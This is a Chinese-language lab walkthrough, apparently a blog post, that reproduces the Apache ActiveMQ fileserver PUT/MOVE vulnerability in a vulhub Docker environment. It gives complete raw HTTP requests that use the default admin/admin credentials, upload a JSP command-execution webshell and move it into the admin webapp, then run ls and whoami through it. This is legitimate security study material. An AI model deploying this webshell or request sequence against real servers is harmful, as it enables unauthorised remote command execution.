一.环境配置
腾讯云的ubuntu操作系统,已经安装有docker 和 vulhub
直接来到
data:image/s3,"s3://crabby-images/783db/783db9ade2f897f7a7478573699ac4792c76e2ec" alt=""
data:image/s3,"s3://crabby-images/7fb90/7fb90710db8b3f4816a2bc7b2380afb52667424c" alt=""
data:image/s3,"s3://crabby-images/d4ef2/d4ef20202cf7a7177cf3c0433ad8c7d384eee4c2" alt=""
data:image/s3,"s3://crabby-images/57a1c/57a1c986ff309575d9e0189c3fa4c4b685065b66" alt=""
启动环境docker-compose,要在root权限下运行。
data:image/s3,"s3://crabby-images/d002e/d002e0205393c2d7f7e34369c1d3025ce8f71a5e" alt=""
docker-compose up -d
若出现等待时间过长的情况,请参考这篇文章http://t.csdnimg.cn/SYhbE
data:image/s3,"s3://crabby-images/05bf8/05bf819b7ceb098ca154b05cd9e27ce44826955e" alt=""
若访问成功则环境搭建成功。
data:image/s3,"s3://crabby-images/a0568/a0568c96c5e70d67b38df50aeea79fd8de27fef1" alt=""
二.漏洞复现
目录拼接admin,进行登录操作。默认账户密码为admin/admin。
访问以下目录,找到文件上传的地址。
http://公网ip:8161/admin/test/systemProperties.jsp
data:image/s3,"s3://crabby-images/7e344/7e3440d48a95f9071350f8e61ade3e4fb79b37b4" alt=""
随便抓一个页面的包,我这里就抓刚刚查询目录那个页面的包。
data:image/s3,"s3://crabby-images/9c909/9c909c71d4957e6cfae1c1a84134dce96ce55652" alt=""
写入webshell文件。
将报文转发到Repeater。
data:image/s3,"s3://crabby-images/5226b/5226b210f205cf46e6843b2b43345e898d1215bf" alt=""
进入Repeater中的Header模块,修改报文第一行,并在报文最后添加木马。
data:image/s3,"s3://crabby-images/e8325/e83255a4ef7900bad73d9f6ff7b5a32b7a00349d" alt=""
返回Repeater中的Raw模块,点击Go发送报文。
data:image/s3,"s3://crabby-images/883e8/883e892df83b6a5bd4e2d9da0c8f7349c4dc78d3" alt=""
PUT /fileserver/1.jsp HTTP/1.1
Host: 公网ip:8161
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=rveyn........................
Connection: close
<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>
上传成功。
data:image/s3,"s3://crabby-images/4b7cd/4b7cd425e6c29f2b374e74b5e466a86326c2a5d8" alt=""
访问http://公网ip:8161/fileserver/1.jsp
发现上传成功,但没有解析
data:image/s3,"s3://crabby-images/be6a7/be6a7f17e1084182accf3bc6ccced972e19ff6e3" alt=""
ActiveMQ Web控制台分为三个应用程序:admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能使用,fileserver不需要登录。
利用MOVE,将木马文件移动到api或者admin,我这边是移动到了admin目录下
还是刚刚的报文,更该第一行和增加第三行。第三行的路径就是最开始查询到的目录。
data:image/s3,"s3://crabby-images/098ae/098ae8e03244211cb1148699790e6f154f6bd147" alt=""
MOVE /fileserver/1.jsp HTTP/1.1
Host: 公网ip:8161
Destination:file:///opt/activemq/webapps/admin/1.jsp
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=yts9........................
Connection: close
Content-Length: 397
<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>
访问文件http://公网ip:8161/admin/1.jsp?cmd=ls
data:image/s3,"s3://crabby-images/8f432/8f432e7b6ba55be7579f87d44f1312319587700f" alt=""
执行命令whoami
data:image/s3,"s3://crabby-images/0deea/0deea22a57fb36a05073d45175c6e1fac36ff9bd" alt=""
漏洞复现完成。